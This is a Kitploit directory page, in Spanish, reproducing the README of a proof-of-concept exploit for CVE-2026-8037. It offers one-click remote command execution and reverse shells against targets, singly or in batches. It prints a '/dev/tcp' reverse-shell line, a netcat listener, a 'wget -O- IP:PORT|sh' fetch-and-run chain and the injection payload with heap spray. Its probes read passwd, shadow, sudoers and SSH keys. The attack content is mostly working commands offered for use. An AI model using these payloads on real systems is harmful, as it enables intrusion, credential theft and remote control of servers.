Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-8037-POC — Incluye detección de comandos ejecutables y getshell con un clic (requiere un servicio de despliegue en el servidor) | Kitploit
Herramientas/GitHubGitHub/caster-chen/cve-2026-8037-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

Incluye detección de comandos ejecutables y getshell con un clic (requiere un servicio de despliegue en el servidor)

Ver Repositorio
3hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-8037-POC

Incluye detección de comandos ejecutables y getshell con un solo clic (requiere un servicio desplegado en el servidor) pco.yaml junto con nuclei permite una detección rápida

Inicio rápido

Modo interactivo

root@kitploit:~
python go.py

Introduzca la URL objetivo → seleccione el menú de funciones.

Detección de objetivos

root@kitploit:~
# Detección rápida (8 elementos de información básica)
python go.py -t https://IP:PORT --probe fast

# Detección profunda (todos los comandos: 30+ elementos)
python go.py -t https://IP:PORT --probe deep

# Detección por lotes
python go.py -f vulnerable_targets.txt --probe fast

Ejecución de comandos

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# Lotes concurrentes (20 hilos)
python go.py -f targets.txt -c "hostname" --batch 20

Obtener shell inversa con un solo clic

En la máquina atacante, abre dos terminales:

root@kitploit:~
# Terminal 1 - Servicio HTTP (proporciona rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# Terminal 2 - Esperar la shell inversa
nc -lvnp 8088

Luego envía el payload:

root@kitploit:~
# Objetivo único
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# Por lotes (en serie, solo uno a la vez)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

El script imprimirá los pasos de preparación antes de enviar.


Contenido de la detección profunda

CategoríaComando
Información básicahostname, uname -a, kernel, OS release, uptime
Usuariosid, whoami, users/w/who
Redifconfig, route, arp, listening ports, connections, iptables
Sistemaprocesses, cpuinfo, meminfo, disk, mount
Archivosls / /root /tmp /home /etc
Configuracióncrontab, passwd, shadow, sudoers, SSH keys
Extensiónconfig search, scripts, docker, containers

Principio de inyección

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
  • apiuser="''''" desencadena el error de escape_quotes() que no termina en null
  • g0~g60 heap spray 61 veces, aumentando la tasa de éxito
  • '; <命令> # cierra el contexto, # comenta lo siguiente

Límite de longitud

Sin echo tag se pueden usar 34 caracteres:

root@kitploit:~
wget -O- IP:PORT|sh    (31 caracteres)

Cadena de tuberías: wget descarga → sh ejecuta → bash regresa el shell inverso al puerto especificado.


Resumen de parámetros

ParámetroFunción
-t, --target URLDirección objetivo
-f, --file FILEArchivo de lista de objetivos
-l, --lhost IPIP de la máquina atacante
-p, --lport PORTPuerto del servicio HTTP (por defecto 8087)
-n, --ncport PORTPuerto de escucha nc (por defecto 8088)
-c, --cmd CMDEjecutar comando
--probe fast/deepDetección rápida/profunda
--batch NNúmero de lotes concurrentes (por defecto en serie)
Descargar herramienta